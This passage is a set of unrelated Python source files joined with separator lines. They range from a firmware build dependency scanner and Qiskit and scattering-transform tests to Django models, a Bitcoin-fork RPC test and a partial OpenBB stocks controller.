Fd = open(F.Path, 'rb')
FileContent = Fd.read()
Fd.close()
except BaseException as X:
EdkLogger.error("build", FILE_OPEN_FAILURE, ExtraData=F.Path + "\n\t" + str(X))
if len(FileContent) == 0:
continue
try:
if FileContent[0] == 0xff or FileContent[0] == 0xfe:
FileContent = FileContent.decode('utf-16')
else:
FileContent = FileContent.decode()
except:
# The file is not txt file. for example .mcb file
continue
IncludedFileList = gIncludePattern.findall(FileContent)
for Inc in IncludedFileList:
Inc = Inc.strip()
# if there's macro used to reference header file, expand it
HeaderList = gMacroPattern.findall(Inc)
if len(HeaderList) == 1 and len(HeaderList[0]) == 2:
HeaderType = HeaderList[0][0]
HeaderKey = HeaderList[0][1]
if HeaderType in gIncludeMacroConversion:
Inc = gIncludeMacroConversion[HeaderType] % {"HeaderKey" : HeaderKey}
else:
# not known macro used in #include, always build the file by
# returning a empty dependency
FileCache[File] = []
return []
Inc = os.path.normpath(Inc)
CurrentFileDependencyList.append(Inc)
DepDb[F] = CurrentFileDependencyList
CurrentFilePath = F.Dir
PathList = [CurrentFilePath] + SearchPathList
for Inc in CurrentFileDependencyList:
for SearchPath in PathList:
FilePath = os.path.join(SearchPath, Inc)
if FilePath in gIsFileMap:
if not gIsFileMap[FilePath]:
continue
# If isfile is called too many times, the performance is slow down.
elif not os.path.isfile(FilePath):
gIsFileMap[FilePath] = False
continue
else:
gIsFileMap[FilePath] = True
FilePath = PathClass(FilePath)
FullPathDependList.append(FilePath)
if FilePath not in DependencySet:
FileStack.append(FilePath)
break
else:
EdkLogger.debug(EdkLogger.DEBUG_9, "%s included by %s was not found "\
"in any given path:\n\t%s" % (Inc, F, "\n\t".join(SearchPathList)))
FileCache[F] = FullPathDependList
DependencySet.update(FullPathDependList)
DependencySet.update(ForceList)
if File in DependencySet:
DependencySet.remove(File)
DependencyList = list(DependencySet) # remove duplicate ones
return DependencyList
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
Template 9c_1:
.. parsed-literal::
┌───┐ ┌───┐┌───┐ ┌───┐ ┌───┐
q_0: ┤ X ├──■──┤ X ├┤ X ├─────┤ X ├──■───────┤ X ├
└─┬─┘┌─┴─┐└───┘└─┬─┘┌───┐└─┬─┘┌─┴─┐┌───┐└─┬─┘
q_1: ──■──┤ X ├───────■──┤ X ├──■──┤ X ├┤ X ├──■──
└───┘ └───┘ └───┘└───┘
"""
from qiskit.circuit.quantumcircuit import QuantumCircuit
def template_9c_1():
"""
Returns:
QuantumCircuit: template as a quantum circuit.
"""
qc = QuantumCircuit(2)
qc.cx(1, 0)
qc.cx(0, 1)
qc.x(0)
qc.cx(1, 0)
qc.x(1)
qc.cx(1, 0)
qc.cx(0, 1)
qc.x(1)
qc.cx(1, 0)
return qc
|
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
from imutils.video import VideoStream
import cv2
import numpy as np
import imutils
import time
import os
def detect_glasses(frame, faceNet, glassesNet):
# make blob from image
(h, w) = frame.shape[:2]
blob = cv2.dnn.blobFromImage(frame, 1.0, (224, 224), (104.0, 177.0, 123.0))
# give blob to network and get face detections
faceNet.setInput(blob)
face_detections = faceNet.forward()
# init list of faces and their locations along
# with list of predictions from glasses network
faces = []
locations = []
predictions = []
# for each detection
for i in range(0, face_detections.shape[2]):
# get confidence for each detection
confidence = face_detections[0, 0, i, 2]
# filter out low confidence detections
if confidence > 0.5:
# create the box around face
box = face_detections[0, 0, i, 3:7] * np.array([w, h, w, h])
(startX, startY, endX, endY) = box.astype('int')
# make sure the boxes are in frame
(startX, startY) = (max(0, startX), max(0, startY))
(endX, endY) = (min(w - 1, endX), min(h - 1, endY))
# get the face region of interest
face = frame[startY:endY, startX:endX]
face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)
face = cv2.resize(face, (224, 224))
face = img_to_array(face)
face = preprocess_input(face)
# add face and box to lists
faces.append(face)
locations.append((startX, startY, endX, endY))
# only make glasses predictions if we detect faces
if len(faces) > 0:
faces = np.array(faces, dtype='float32')
predictions = glassesNet.predict(faces, batch_size=32)
# return tuple with locations & predictions
return (locations, predictions)
# load face detection model from https://github.com/opencv/opencv/tree/3.4.0/samples/dnn
prototxt = r'face_detection/deploy.prototxt'
caffemodel = r'face_detection/res10_300x300_ssd_iter_140000.caffemodel'
faceNet = cv2.dnn.readNet(prototxt, caffemodel)
# load the glasses detection model we made in train.py
glassesNet = load_model('glasses_detection.model')
# start the video stream from webcam
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
# loop over video frames
while True:
frame = vs.read()
frame = imutils.resize(frame, width=600)
# detect faces in frame and determine if they're
# wearing glasses or not
(locations, predictions) = detect_glasses(frame, faceNet, glassesNet)
# loop over detected locations
for (box, prediction) in zip(locations, predictions):
(startX, startY, endX, endY) = box
(glasses, withoutGlasses) = prediction
# determine label
label = "Glasses" if glasses > withoutGlasses else "No Glasses"
color = (0, 255, 0) if label == "Glasses" else (0, 0, 255)
# label text with probability
label = "{}: {:.2f}%".format(label, max(glasses, withoutGlasses) * 100)
# display box & label on frame
cv2.putText(frame, label, (startX, startY - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2)
cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)
# show output frame
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# quit using q key
if key == ord('q'):
break
cv2.destroyAllWindows()
vs.stop()
|
def create_graph(adj_matrix_tmp, dictionary, attribute, val_to_drop,directed_type,delete_na_cols):
##################### data preprocessing(part II) ########################
# create graph from adjacency matrix with gender information, delete nodes without gender information, keep only the largest CC
# input:
# adj_matrix_tmp: an adjacency matrix for the graph
# attribute: the property that we want to set for each node
# dictionary: (key, value) pairs for each node
# val_to_drop: value that needs to be dropped
# attribute: which property is considered
# return:
# a graph with attribute information for each node
##########################################################################
graph = nx.from_numpy_matrix(adj_matrix_tmp)
# get the label for each person
keys = np.array(range(len(dictionary.keys())))
## we relabel keys but this preserves corresponding value with updated keys
y_vector_list = list(dictionary.values())
# create an adjacency matrix with the rows and columns are ordered according to the nodes in dictionary.keys()
adj_matrix_input = nx.adj_matrix(graph,nodelist = dictionary.keys()).todense() # note: will automatically be an out-link matrix when graph is directed
# set each node's attribute to be the key
nx.set_node_attributes(graph,dictionary, attribute)
### remove NA labeled nodes and get new graph(with all nodes have gender label)
keys_new = []
for i in range(len(y_vector_list)):
if y_vector_list[i]!=val_to_drop:
keys_new.append(keys[i])
# convert new keys into an array
keys = np.array(keys_new)
# delete all 0 elements in the y_vector_list
y_vector_list = [c for c in y_vector_list if c != val_to_drop]
# convert y_vector_list into an array
y_vector_list = np.array(y_vector_list)
adj_matrix_input = adj_matrix_input[np.array(keys),:]
# and remove NA nodes in column too
if delete_na_cols == 'yes':
#update the graph and adjacency matrix
adj_matrix_input=adj_matrix_input[:,np.array(keys)]
graph = nx.from_numpy_matrix(adj_matrix_input)
attr_new = create_dict(range(adj_matrix_input.shape[0]),y_vector_list)
nx.set_node_attributes(graph,attr_new,attribute)
## create undirected network, subset to nodes only in largest connected component
if directed_type == None:
if nx.number_connected_components(graph) > 1:
#print(nx.number_connected_components(graph))
max_cc_index = 0
max_cc_size = 0
for c in nx.connected_components(graph):
if graph.subgraph(c).size() > max_cc_size:
max_cc_index = c
max_cc_size = graph.subgraph(c).size()
graph_new = graph.subgraph(max_cc_index)
graph = graph_new
# get the gender vector for each node
gender_vector = nx.get_node_attributes(graph, attribute)
gender_y = list(gender_vector.values())
gender_y = np.array(gender_y)
return(graph, gender_y)
|
"""Handle the arguments"""
import argparse
def parse(args):
"""Use argparse to parse provided command-line arguments"""
|
import logging
import sys
from framework.transactions.context import TokuTransaction
from website.app import init_app
from website.models import NodeLog, PreprintService
from scripts import utils as script_utils
from modularodm import Q
from modularodm.exceptions import NoResultsFound
logger = logging.getLogger(__name__)
def migrate(dry_run=True):
node_logs = list(NodeLog.find(
Q('action', 'in', [NodeLog.PREPRINT_FILE_UPDATED, NodeLog.PREPRINT_INITIATED]) &
Q('params.preprint', 'exists', False)
))
logger.info('Preparing to migrate {} NodeLogs'.format(len(node_logs)))
count = 0
for log in node_logs:
preprint = None
node_id = log.params.get('node')
try:
preprint = PreprintService.find_one(Q('node', 'eq', node_id))
except NoResultsFound:
logger.error('Skipping {}, preprint not found for node: {}'.format(log._id, node_id))
continue
logger.info(
'Migrating log - {} - to add params.preprint: {}, '.format(log._id, preprint._id)
)
log.params['preprint'] = preprint._id
log.save()
count += 1
logger.info('Migrated {} logs'.format(count))
def main():
dry_run = '--dry' in sys.argv
if not dry_run:
script_utils.add_file_logger(logger, __file__)
init_app(set_backends=True, routes=False)
with TokuTransaction():
migrate(dry_run=dry_run)
if dry_run:
raise RuntimeError('Dry run, transaction rolled back.')
if __name__ == '__main__':
main()
|
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Question(models.Model):
author = models.ForeignKey(verbose_name=_('Автор'), to=User)
title = models.CharField(verbose_name=_('Название'), max_length=200)
text = models.TextField(verbose_name=_('Текст'))
is_active = models.BooleanField(verbose_name=_('Отображать?'), default=True)
class Meta:
verbose_name = _('Вопрос')
verbose_name_plural = _('Вопросы')
def __str__(self):
return self.title
class Choice(models.Model):
question = models.ForeignKey(verbose_name=_('Вопрос'), to=Question, on_delete=models.CASCADE)
title = models.CharField(verbose_name=_('Название'), max_length=200)
text = models.TextField(verbose_name=_('Текст'))
position = models.IntegerField(verbose_name=_('Сортировка'), default=0)
is_active = models.BooleanField(verbose_name=_('Отображать?'), default=True)
class Meta:
verbose_name = _('Ответ')
verbose_name_plural = _('Ответы')
def __str__(self):
return self.title
|
# coding: utf-8
from __future__ import unicode_literals, absolute_import
import numpy as np
from .base import FilterTestCase
from os.path import abspath, join, dirname
STORAGE_PATH = abspath(join(dirname(__file__), 'fixtures'))
filter_data = {
'async': False,
'params': ({'regex': '[-]?(?:(?:[\\d]+\\.?[\\d]*)|(?:[\\d]*\\.?[\\d]+))',
'parse': float},),
'name': 'rmd',
'defaults': None}
class RmdFilterUnittestsTestCase(FilterTestCase):
@classmethod
def setUpClass(cls):
try:
from pyexiv2 import ImageMetadata
except ImportError:
raise ImportError('Pyexiv2 is not available. Please install it.')
def get_fixture_path(self, name):
return join(STORAGE_PATH, name)
def load_file(self, file_name, engine):
with open(join(STORAGE_PATH, file_name), 'rb') as im:
buffer = im.read()
engine.load(buffer, None)
def get_color_at(self, image, x, y):
px = image[y][x]
r, g, b = px[0], px[1], px[2]
if r > b and r > g:
return 'red'
elif g > b and g > r:
return 'green'
elif b > r and b > g:
return 'blue'
elif r == 255 and b == 255 and g == 255:
return 'white'
return 'unknown color ({},{},{})'.format(r, g, b)
def assertCrop(self, context, reference):
crop = (
context['left'], context['top'], context['right'], context['bottom']
)
self.assertEqual(crop, reference)
def test_regions_image(self):
image = self.get_filtered('regions2.jpg', 'universalimages.filters.rmd', 'rmd()')
self.assertEqual(self.get_color_at(image, 0, 0), 'blue')
self.assertEqual(self.get_color_at(image, 0, 100), 'green')
self.assertEqual(self.get_color_at(image, 151, 201), 'red')
def test_small_crop_exact_safe_area1(self):
def config_context(context):
context.request.width = 300
context.request.height = 200
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (150, 200, 450, 400))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (150, 200, 450, 400))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 300)
self.assertEqual(len(image), 200)
# self.debug(image)
self.assertEqual(self.get_color_at(image, 0, 0), 'red')
def test_small_crop_less_than_safe_area1(self):
def config_context(context):
context.request.width = 240
context.request.height = 160
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (150, 200, 450, 400))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (150, 200, 450, 400))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 240)
self.assertEqual(len(image), 160)
self.assertEqual(self.get_color_at(image, 0, 0), 'red')
def test_small_crop_less_than_safe_area2(self):
def config_context(context):
context.request.width = 200
context.request.height = 200
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (150, 133, 450, 433))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (150, 133, 450, 433))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 200)
self.assertEqual(len(image), 200)
self.assertEqual(self.get_color_at(image, 0, 0), 'green')
self.assertEqual(self.get_color_at(image, 0, 88), 'red')
def test_small_crop_less_than_safe_area3(self):
def config_context(context):
context.request.width = 300
context.request.height = 150
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
# 400x200
self.assertCrop(fltr.context.request.crop, (83, 200, 483, 400))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (83, 200, 483, 400))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 300)
self.assertEqual(len(image), 150)
self.assertEqual(self.get_color_at(image, 0, 0), 'green')
self.assertEqual(self.get_color_at(image, 51, 0), 'red')
def test_small_crop_less_than_safe_area4(self):
def config_context(context):
context.request.width = 200
context.request.height = 300
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
# 300 x 450
self.assertCrop(fltr.context.request.crop, (150, 89, 450, 539))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (150, 89, 450, 539))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 200)
self.assertEqual(len(image), 300)
self.assertEqual(self.get_color_at(image, 0, 0), 'green')
self.assertEqual(self.get_color_at(image, 0, 78), 'red') # (450/640) * (200-89)
def test_linear_crop_1(self):
def config_context(context):
context.request.width = 400
context.request.height = 300
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (37, 103, 570, 503))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (37, 103, 570, 503))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 400)
self.assertEqual(len(image), 300)
self.assertEqual(self.get_color_at(image, 0, 0), 'green')
# (400/533) * (150 - 37), (400/533) * (200 - 103)
self.assertEqual(self.get_color_at(image, 85, 73), 'red')
def test_linear_crop_2(self):
def config_context(context):
context.request.width = 480
context.request.height = 480
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (55, 80, 535, 560))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (55, 80, 535, 560))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 480)
self.assertEqual(len(image), 480)
self.assertEqual(self.get_color_at(image, 0, 0), 'green')
# (480/480) * (150 - 55), (480/480) * (200 - 80)
self.assertEqual(self.get_color_at(image, 95, 120), 'red')
def test_linear_crop_3(self):
# Target height is larger than Crop MinHeight, so the full crop area is used.
def config_context(context):
context.request.width = 400
context.request.height = 400
fltr = self.get_filter('universalimages.filters.rmd', 'rmd()',
config_context=config_context)
self.assertFalse(fltr.context.request.should_crop)
self.load_file('regions2.jpg', fltr.engine)
fltr.run()
self.assertTrue(fltr.context.request.should_crop)
self.assertCrop(fltr.context.request.crop, (55, 80, 535, 560))
fltr.context.transformer.img_operation_worker()
self.assertCrop(fltr.context.request.crop, (55, 80, 535, 560))
image = np.array(fltr.engine.image)
self.assertEqual(len(image[0]), 400)
self.assertEqual(len(image), 400)
self.assertEqual(self.get_color_at(image, 0, 0), 'green')
# (400/480) * (150 - 55), (400/480) * (200 - 80)
self.assertEqual(self.get_color_at(image, 83, 100), 'red')
|
""" This script will test the submodules used by the scattering module"""
import torch
import unittest
import numpy as np
from scatharm.filters_bank import gaussian_3d, solid_harmonic_filters_bank
from scatharm.scattering import SolidHarmonicScattering
from scatharm import utils as sl
gpu_flags = [False]
if torch.cuda.is_available():
gpu_flags.append(True)
def linfnorm(x,y):
return torch.max(torch.abs(x-y))
class TestScattering(unittest.TestCase):
def testFFT3dCentralFreqBatch(self):
# Checked the 0 frequency for the 3D FFT
for gpu in gpu_flags:
x = torch.FloatTensor(1, 32, 32, 32, 2).fill_(0)
if gpu:
x = x.cuda()
a = x.sum()
y = sl.fft(x)
c = y[:,0,0,0].sum()
self.assertAlmostEqual(float(a), float(c), places=6)
def testSumOfGaussianFFT3d(self):
# Check the validity of Fourier transform of sum of gaussians
_N = 128
M, N, O = _N, _N, _N
sigma = 2.
n_gaussians = 10
np_grid = np.fft.ifftshift(
np.mgrid[-M//2:-M//2+M, -N//2:-N//2+N, -O//2:-O//2+O].astype('float32'), axes=(1,2,3))
np_fourier_grid = np_grid.copy()
np_fourier_grid[0] *= 2*np.pi / M
np_fourier_grid[1] *= 2*np.pi / N
np_fourier_grid[2] *= 2*np.pi / O
grid = torch.from_numpy(np_grid)
fourier_grid = torch.from_numpy(np_fourier_grid)
positions = torch.FloatTensor(1, n_gaussians, 3).uniform_(-0.5 * _N + 5*sigma, 0.5 * _N - 5*sigma)
positions[...,2].fill_(0)
weights = torch.FloatTensor(1, n_gaussians).uniform_(1, 10)
for gpu in gpu_flags:
if gpu:
_grid = grid.cuda()
_fourier_grid = fourier_grid.cuda()
_positions = positions.cuda()
_weights = weights.cuda()
else:
_grid = grid
_fourier_grid = fourier_grid
_positions = positions
_weights = weights
sum_of_gauss = sl.generate_weighted_sum_of_gaussians(
_grid, _positions, _weights, sigma, cuda=gpu)
sum_of_gauss_fourier = sl.generate_weighted_sum_of_gaussians_in_fourier_space(
_fourier_grid, _positions, _weights, sigma, cuda=gpu)
sum_of_gauss_ = sl.fft(sum_of_gauss_fourier, inverse=True)[..., 0]
difference = float(torch.norm(sum_of_gauss - sum_of_gauss_))
self.assertAlmostEqual(difference, 0., places=5)
def testSolidHarmonicFFT3d(self):
# test that solid harmonic fourier inverse fourier transform corresponds to the formula
M, N, O = 192, 128, 96
sigma, L = 3., 1
j_values = [0]
solid_harmonics = solid_harmonic_filters_bank(M, N, O, j_values, L, sigma, fourier=False)
solid_harmonics_fourier = solid_harmonic_filters_bank(M, N, O, j_values, L, sigma, fourier=True)
for gpu in gpu_flags:
for l in range(L+1):
for m in range(2*l+1):
solid_harm = solid_harmonics[l][0:1,m]
solid_harm_fourier = solid_harmonics_fourier[l][0:1,m]
if gpu:
solid_harm = solid_harm.cuda()
solid_harm_fourier = solid_harm_fourier.cuda()
solid_harm_ = sl.fft(solid_harm_fourier, inverse=True)
difference = float(torch.norm(solid_harm - solid_harm_))
self.assertAlmostEqual(difference, 0, places=7)
def testSolidHarmonicScattering(self):
# Compare value to analytical formula in the case of a single Gaussian
centers = torch.FloatTensor(1, 1, 3).fill_(0)
weights = torch.FloatTensor(1, 1).fill_(1)
sigma_gaussian = 3.
sigma_0_wavelet = 3.
M, N, O, j_values, L = 128, 128, 128, [0, 1], 4
grid = torch.from_numpy(
np.fft.ifftshift(np.mgrid[-M//2:-M//2+M, -N//2:-N//2+N, -O//2:-O//2+O].astype('float32'), axes=(1,2,3)))
x = sl.generate_weighted_sum_of_gaussians(grid, centers, weights, sigma_gaussian)
scat = SolidHarmonicScattering(M=M, N=N, O=O, j_values=j_values, L=L, sigma_0=sigma_0_wavelet)
args = {'integral_powers': [1]}
s_order_0, s_order_1 = scat(x, order_2=False, method='integral', method_args=args)
for i_j, j in enumerate(j_values):
sigma_wavelet = sigma_0_wavelet*2**j
k = sigma_wavelet / np.sqrt(sigma_wavelet**2 + sigma_gaussian**2)
for l in range(1, L+1):
self.assertAlmostEqual(float(s_order_1[0, 0, i_j, l]), k**l, places=4)
def testLowPassFilter(self):
# Test convolution of gaussian with a gaussian
centers = torch.FloatTensor(1, 1, 3).fill_(0)
weights = torch.FloatTensor(1, 1).fill_(1)
sigma_gaussian = 3.
sigma_0_wavelet = 3.
M, N, O, j_values, L = 128, 128, 128, [0, 1, 2], 0
grid = torch.from_numpy(
np.fft.ifftshift(np.mgrid[-M//2:-M//2+M, -N//2:-N//2+N, -O//2:-O//2+O].astype('float32'), axes=(1,2,3)))
x = torch.FloatTensor(1, M, N, O, 2).fill_(0)
x[..., 0] = sl.generate_weighted_sum_of_gaussians(grid, centers, weights, sigma_gaussian)
scat = SolidHarmonicScattering(M=M, N=N, O=O, j_values=j_values, L=L, sigma_0=sigma_0_wavelet)
for i_j, j in enumerate(j_values):
convolved_gaussian = scat._low_pass_filter(x, i_j)
sigma_convolved_gaussian = np.sqrt(sigma_gaussian**2 + (sigma_0_wavelet*2**j)**2)
true_convolved_gaussian = torch.FloatTensor(1, M, N, O, 2).fill_(0)
true_convolved_gaussian[0, ..., 0] = torch.from_numpy(gaussian_3d(M, N, O, sigma_convolved_gaussian, fourier=False))
diff = float(torch.norm(convolved_gaussian - true_convolved_gaussian))
self.assertAlmostEqual(diff, 0, places=5)
if __name__ == '__main__':
unittest.main()
|
"""
Prepare the destination folder for backup. Delete the pre existing files there.
"""
import os
import shutil
def readyDst(dst):
if os.path.isfile(dst):
os.remove(dst)
print("%s File deleted" %(os.path.basename(dst)))
elif os.path.isdir(dst):
shutil.rmtree(dst)
print("%s Directory deleted" %dst)
|
import numpy as np
class Rosenbrock:
def __init__(self, n):
self.n = n
def function_eval(self, x):
assert x.shape[0] == self.n
a = x[1:, :] - x[:-1, :]**2
b = 1 - x[:-1, :]
out = np.sum(100 * a**2 + b**2, axis=0)
return out
|
__author__ = 'patras'
from domain_springDoor import *
from timer import DURATION
from state import state
DURATION.TIME = {
'unlatch1': 5,
'unlatch2': 5,
'holdDoor': 2,
'passDoor': 3,
'releaseDoor': 2,
'closeDoors': 3,
'move': 10,
'take': 2,
'put': 2,
}
DURATION.COUNTER = {
'unlatch1': 5,
'unlatch2': 5,
'holdDoor': 2,
'passDoor': 3,
'releaseDoor': 2,
'closeDoors': 3,
'move': 10,
'take': 2,
'put': 2,
}
rv.LOCATIONS = [1, 2, 3]
rv.EDGES = {1: [2, 3], 2: [1], 3: [1]}
rv.DOORLOCATIONS = {(1, 3): 'd1', (1, 2): 'd2'}
rv.ROBOTS = ['r1', 'r2']
rv.DOORS = ['d1', 'd2']
rv.DOORTYPES = {'d1': 'ordinary', 'd2': 'ordinary'}
def ResetState():
state.load = {'r1': NIL, 'r2': NIL}
state.doorStatus = {'d1': 'closed', 'd2': 'closed'}
state.loc = {'r1': 2, 'r2': 1}
state.pos = {'o1': 3, 'o2': 3}
state.done = {0: False}
state.doorType = {'d1': UNK, 'd2': UNK}
tasks = {
1: [['moveTo', 'r2', 1]]
}
eventsEnv = {}
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Bull Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test longpolling with getblocktemplate."""
from test_framework.test_framework import BullTestFramework
from test_framework.util import *
import threading
class LongpollThread(threading.Thread):
def __init__(self, node):
threading.Thread.__init__(self)
# query current longpollid
templat = node.getblocktemplate()
self.longpollid = templat['longpollid']
# create a new connection to the node, we can't use the same
# connection from two threads
self.node = get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
def run(self):
self.node.getblocktemplate({'longpollid':self.longpollid})
class GetBlockTemplateLPTest(BullTestFramework):
def set_test_params(self):
self.num_nodes = 2
def run_test(self):
self.log.info("Warning: this test will take about 70 seconds in the best case. Be patient.")
self.nodes[0].generate(10)
templat = self.nodes[0].getblocktemplate()
longpollid = templat['longpollid']
# longpollid should not change between successive invocations if nothing else happens
templat2 = self.nodes[0].getblocktemplate()
assert(templat2['longpollid'] == longpollid)
# Test 1: test that the longpolling wait if we do nothing
thr = LongpollThread(self.nodes[0])
thr.start()
# check that thread still lives
thr.join(5) # wait 5 seconds or until thread exits
assert(thr.is_alive())
# Test 2: test that longpoll will terminate if another node generates a block
self.nodes[1].generate(1) # generate a block on another node
# check that thread will exit now that new transaction entered mempool
thr.join(5) # wait 5 seconds or until thread exits
assert(not thr.is_alive())
# Test 3: test that longpoll will terminate if we generate a block ourselves
thr = LongpollThread(self.nodes[0])
thr.start()
self.nodes[0].generate(1) # generate a block on another node
thr.join(5) # wait 5 seconds or until thread exits
assert(not thr.is_alive())
# Test 4: test that introducing a new transaction into the mempool will terminate the longpoll
thr = LongpollThread(self.nodes[0])
thr.start()
# generate a random transaction and submit it
min_relay_fee = self.nodes[0].getnetworkinfo()["relayfee"]
# min_relay_fee is fee per 1000 bytes, which should be more than enough.
(txid, txhex, fee) = random_transaction(self.nodes, Decimal("1.1"), min_relay_fee, Decimal("0.001"), 20)
# after one minute, every 10 seconds the mempool is probed, so in 80 seconds it should have returned
thr.join(60 + 20)
assert(not thr.is_alive())
if __name__ == '__main__':
GetBlockTemplateLPTest().main()
|
import argparse
import pandas as pd
import datashader as ds
import datashader.transfer_functions as tf
from datashader.utils import export_image
def create_plot(data, out, width):
"""Creates a figure of the ZVV transit network using ZVV's color scheme.
Args:
data: a csv file containing data usable for line plots
out: the generated imnage is saved here
Returns:
None
"""
plot_data = pd.read_csv(data, low_memory=False)
x_range = (plot_data.shape_pt_lon.min(), plot_data.shape_pt_lon.max())
y_range = (plot_data.shape_pt_lat.min(), plot_data.shape_pt_lat.max())
height = int(round(width * (y_range[1] - y_range[0]) / (x_range[1] - x_range[0])))
cvs = ds.Canvas(
plot_width=width,
plot_height=height,
x_range=x_range,
y_range=y_range
)
layers = []
for color, data_part in plot_data.groupby('route_color'):
agg = cvs.line(
data_part, 'shape_pt_lon', 'shape_pt_lat',
agg=ds.sum('times_taken')
)
image_part = tf.shade(agg, cmap=['#000000', '#' + color], how='eq_hist')
layers.append(image_part)
image = tf.stack(*layers, how='add')
if out.endswith('.png'):
out = out[:-4]
export_image(image, filename=out, background='black')
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'-d', '--data',
help="A line-plot-compatible data file",
type=str,
required=True
)
parser.add_argument(
'-o', '--out',
help="The path of the output file",
type=str,
required=True
)
parser.add_argument(
'-w', '--width',
help="The width of the image in pixels",
type=int,
default=1600
)
args = parser.parse_args()
create_plot(args.data, args.out, args.width)
if __name__ == "__main__":
main()
|
"""Stock Context Controller"""
__docformat__ = "numpy"
import argparse
import logging
import os
from datetime import datetime, timedelta
from typing import List
import financedatabase
import yfinance as yf
from prompt_toolkit.completion import NestedCompleter
from openbb_terminal import feature_flags as obbff
from openbb_terminal.common import newsapi_view
from openbb_terminal.common.quantitative_analysis import qa_view
from openbb_terminal.decorators import log_start_end
from openbb_terminal.helper_funcs import (
EXPORT_ONLY_RAW_DATA_ALLOWED,
export_data,
valid_date,
)
from openbb_terminal.helper_classes import AllowArgsWithWhiteSpace
from openbb_terminal.helper_funcs import choice_check_after_action
from openbb_terminal.menu import session
from openbb_terminal.parent_classes import StockBaseController
from openbb_terminal.rich_config import console, translate, MenuText
from openbb_terminal.stocks import stocks_helper
# pylint: disable=R1710,import-outside-toplevel,R0913,R1702,no-member
logger = logging.getLogger(__name__)
class StocksController(StockBaseController):
"""Stocks Controller class"""
CHOICES_COMMANDS = [
"search",
"load",
"quote",
"candle",
"news",
"resources",
"codes",
]
CHOICES_MENUS = [
"ta",
"ba",
"qa",
"pred",
"disc",
"dps",
"scr",
"sia",
"ins",
"gov",
"res",
"fa",
"bt",
"dd",
"ca",
"options",
"th",
]
PATH = "/stocks/"
FILE_PATH = os.path.join(os.path.dirname(__file__), "README.md")
country = financedatabase.show_options("equities", "countries")
sector = financedatabase.show_options("equities", "sectors")
industry = financedatabase.show_options("equities", "industries")
def __init__(self, queue: List[str] = None):
"""Constructor"""
super().__init__(queue)
if session and obbff.USE_PROMPT_TOOLKIT:
choices: dict = {c: {} for c in self.controller_choices}
choices["search"]["--country"] = {c: None for c in self.country}
choices["search"]["-c"] = {c: None for c in self.country}
choices["search"]["--sector"] = {c: None for c in self.sector}
choices["search"]["-s"] = {c: None for c in self.sector}
choices["search"]["--industry"] = {c: None for c in self.industry}
choices["search"]["-i"] = {c: None for c in self.industry}
choices["search"]["--exchange"] = {
